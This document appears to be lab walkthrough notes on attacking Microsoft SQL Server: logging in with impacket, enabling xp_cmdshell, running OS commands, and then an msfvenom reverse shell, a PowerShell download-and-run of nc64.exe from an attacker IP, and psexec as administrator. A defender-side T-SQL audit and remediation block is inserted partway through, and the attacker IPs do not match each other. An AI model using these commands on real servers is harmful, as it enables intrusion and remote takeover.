Pentesting MSSQL

ms-sql-s port 1433

  • Use impacket mssqlclient.py to connect

python mssqlclient.py ARCHETYPE/sql_svc@10.129.62.77 -windows-auth
  • https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server

  • Check what is the role we have in the server

SELECT is_srvrolemember('sysadmin');
  • If the output is 1, it translates to True.

  • Check to see if xp_cmdshell is enabled

SQL> EXEC xp_cmdshell 'net user';
  • Set up the command execution through the xp_cmdshell:

EXEC xp_cmdshell 'net user';
  • On MSSQL 2005 you may need to reactivate xp_cmdshell first, as it is disabled by default:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
sp_configure; -- re-run sp_configure to enable the option, as stated in the error message above
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
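The two things the notes above probe, sysadmin membership (the is_srvrolemember check) and the xp_cmdshell setting (the sp_configure sequence), are also exactly what a DBA or responder should audit after a suspected compromise of a service login like sql_svc. The following T-SQL is an added example for that defender-side check; it is not part of the original notes and assumes a login with sysadmin (or at least VIEW SERVER STATE and ALTER SETTINGS) on SQL Server 2005 or later. The catalog views sys.configurations, sys.server_role_members and sys.server_principals are standard.

```sql
-- Added example (not from the original notes): audit and remediate the
-- sysadmin membership and xp_cmdshell state that the notes above rely on.
-- Assumes a sysadmin (or VIEW SERVER STATE + ALTER SETTINGS) login.

-- 1. Which logins hold the sysadmin fixed server role? A service account
--    such as sql_svc appearing here is the root cause of the whole chain.
SELECT m.name AS member_login, m.type_desc, m.is_disabled
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin'
ORDER BY m.name;

-- 2. Is xp_cmdshell enabled? value_in_use = 1 means the notes' "whoami"
--    step would succeed for any sysadmin caller.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 3. Weak state (what the notes turn on):
--      EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
--    Corrected state: turn xp_cmdshell back off and hide advanced options
--    again, which is the Microsoft default for a fresh install.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 4. Re-check: value_in_use should now be 0 for xp_cmdshell.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';
```

Two points worth knowing when reading the results: commands launched through xp_cmdshell by a sysadmin caller run as the SQL Server service account, so the privileges of that Windows account (not just the SQL login) decide how far step 3 of the notes can go; and because any sysadmin can re-enable xp_cmdshell with the same sp_configure calls, disabling it is only a meaningful control once the sysadmin list from query 1 is trimmed to the logins that genuinely need it.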
  • Now we are able to execute system commands:

xp_cmdshell "whoami"
  • Better Command Execution

xp_cmdshell "powershell -c pwd"
  • Get a shell on target with nc or msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.15.154 LPORT=80 -f exe -o shell.exe
python3 -m http.server
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.9/nc64.exe -outfile nc64.exe; ./nc64.exe"
  • Find the admin password from the shell

python /usr/local/bin/psexec.py administrator@10.129.62.77
